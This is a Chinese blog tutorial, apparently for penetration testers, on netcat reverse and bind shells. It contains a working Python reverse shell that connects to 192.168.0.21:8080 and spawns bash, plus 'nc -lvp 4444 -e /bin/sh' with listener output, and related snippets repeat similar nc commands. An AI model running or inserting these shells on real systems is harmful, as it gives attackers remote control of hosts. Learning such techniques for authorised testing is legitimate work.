linux正向连接shell_使用netcat的正向 / 反向shell

最新推荐文章于 2024-02-17 22:57:45 发布
最新推荐文章于 2024-02-17 22:57:45 发布
阅读量1k 收藏 1
点赞数
文章标签: linux正向连接shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39947306/article/details/111973812
版权

reverse shell

bind shell

reverse shell描述图:

在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。

先启动攻击端的监听:

再在目标端启动反向shell:

linux

然后可以在攻击端控制目标端的服务器,以root权限;

win7

然后可以在攻击端控制目标端的win7系统,以administrator权限;

python的反向shell:

importos,socket,subprocess;

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(('192.168.0.21',8080))#重定向shell输出

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)#执行子程序

p=subprocess.call(['/bin/bash','-i'])

正向bind Shell

在该图中,目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。设置bind shell的步骤如下:

使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。

root@kali:~# nc -lvp 4444 -e /bin/sh

listening on [any] 4444 ...

10.1.20.x: inverse host lookup failed: Unknown host

connect to [10.1.20.x] from (UNKNOWN) [10.1.20.x] 6065

root@kali:~# a

顺便提一下

如果有任何问题,你可以在这里找到我 ,软件测试交流qq群,209092584

weixin_39947306
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Netcat----网络瑞士军刀
转瞬都有的博客
08-02 267
这篇文章将介绍Netcat的用法和命令,包括连接命令,文件传输命令,以及我们知道的反弹shell。主要用到的有两台虚拟机,一台win10、kali。在这里默认读者已经下载完毕。最后我们的目的是为了能更好的学会这个网络工具。而不是给其他人带来相应的麻烦,笔者深知这点,请读者切记。
彻底弄懂netcat命令的使用
Systemcall名屋
02-06 1995
netcat 是一个使用 TCP 或 UDP 协议的网络工具,它被称为网络界的“瑞士军刀”,它可以在两台计算机之间建立连接,进行数据传输。
内网中使用netcat进行正向反向获取shell
bring_coco的博客
12-07 2765
本次演示在linux环境下 一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell 正向shell 由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听): 内网机器上命令:nc -lvp 4444 -e /bin/sh 本地机器上命令:nc 10.0.78.41 4444 显示已经连接 进行验证: 说明正向连接成功 反向shell 反向shell是在本地vps上进行监听,目标机器进行连接 本地机器上命令:nc -l
shell正向反向
qq_46258964的博客
02-05 8344
正向shell反向shell 正向shell:控制端主动发起连接连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
Netcat反向连接与反弹 Shell
最新发布
Kali与编程
02-17 1024
反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。在反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。假设我们要在目标主机上执行一个连接程序,连接到攻击者主机的IP地址为192.168.1.100,端口号为1234的监听程序,并执行一个shell。在目标主机上执行连接程序,并连接到攻击者主机的监听程序。
瑞士军刀——Netcat的安装与详细使用
永不落的梦想
08-02 3820
瑞士军刀——Netcat的安装与使用,多种功能介绍
netcat瑞士军刀(正向shell反向shell
逍遥小哥的博客
12-04 246
不管是正向shell还是反向shell 它们都是由被控制端将命令行输入和输入通过tcp/udp端口,发送到控制端,只是正向shell是由控制端主动发起连接的,而反弹shell是被控制端主动发起连接的。原理:被控端将cmd.exe重定向到控制端的6666端口,控制端只需要监听本地的6666端口,被控端主动连接控制端,即可获得shell。原理:被控端将cmd重定向到本地1111端口,控制端主动连接到被控制端的1111端口,即获得shell反向shell(有安全设备防护,控制端无法主动连接被控制端。
linux正向连接shell_Linux一句话反向shell原理
weixin_32467423的博客
12-24 2034
一、什么是反向shell就是控制端监听在某TCP/UDP端口,被控制端主动连接控制端的这一端口,控制端可以通过这一端口进行相关命令操作。像telnet,ssh这些可以理解为正向shell,控制端主动连通控制端,而反向shell则是正向shell的向。反向shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形,同时也实现了被控端的精准控制(指定了被控制端的IP,除此之外的是无法和被控端无法...
nc_bloaty.rar_creation_linux netcat
09-19
Netcat is entirely my own creation Source Code for Linux.
Linux-NC.rar_NC_linux nc_nc linux_netcat
09-23
Linux下的NC程序,类似于windows下的nc
shell正向解析脚本的实现方法
09-14
主要介绍了shell正向解析脚本的实现方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
rsh:从CLI为Linux和Windows生成反向Shell
02-01
产品特点使用此工具,您可以轻松地使用以下语言快速生成Linux和Windows支持的反向Shell命令: 重击Bash反向壳网猫网猫OpenBSD 非传统PythonIPv4 IPv6 RubyPerlPHP 电源外壳节点JS TCSH Awk Java用法usage: rsh [-h] ...
Netcat-windows-linux.rar_netcat
09-23
netcat在windows和Linux使用方法,简单醒目,适合新人上手
Reverse-Shell-Client:反向外壳客户端是netcat反向外壳侦听器的基于Python的替代方案
05-08
反向外壳客户端是netcat反向外壳侦听器( nc -lvp <port> )的基于Python的替代方案。 默认的反向Shell客户端( rsh-client.py )附带了许多功能,例如在您设法获得Shell的(基于Unix的)远程主机上上传,下载,...
命令注入之反弹shell
SmileAssassn的博客
01-18 385
命令注入之反弹shell
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 2884
详细讲解Linux反弹shell包含的NC正向shell,NC反向shellbash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
Linux Netcat 命令——网络工具中的瑞士军刀
Leo Zhang
04-11 2526
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。 下面是一些使用netcat
linux netcat使用方法
热门推荐
鹏程万里--扬帆起航
09-06 1万+
linux netcat使用方法
shell编程扫盲系列】结合真实案例分析“bash shell -e”到底是啥意思?
一个专注于嵌入式IoT领域的架构师,深耕IoT领域多年,深度掌握IoT领域的相关技术栈,包括但不限于RTOS内核的实现及其移植、硬件驱动移植开发、网络通讯协议开发、编译构建原理及其实现、底层汇编及编译原理、编译优化及代码重构、嵌入式IoT系统的架构设计等。
11-23 8147
本文主要分析了#/bin/bash -e参数的含义,希望对大家有所帮助。
反向shell连接到目标主机
06-10
反向shell连接到目标主机通常需要以下步骤: 1. 在目标主机上启动一个监听程序,等待来自攻击者的连接。 2. 在攻击者的机器上,使用一个工具(如netcat)向目标主机发送一个连接请求,同时将一个反向shell的命令作为参数传递给监听程序。 3. 监听程序接收到连接请求后,会执行反向shell命令,并将一个shell会话返回给攻击者的机器。 4. 攻击者现在可以在目标主机上执行任意命令,并且在反向shell会话中看到输出结果。 需要注意的是,反向shell连接是一种非常危险的攻击技术,因为攻击者可以完全控制目标主机,执行任意命令,甚至窃取敏感信息。因此,不要在未经授权的情况下使用反向shell连接技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值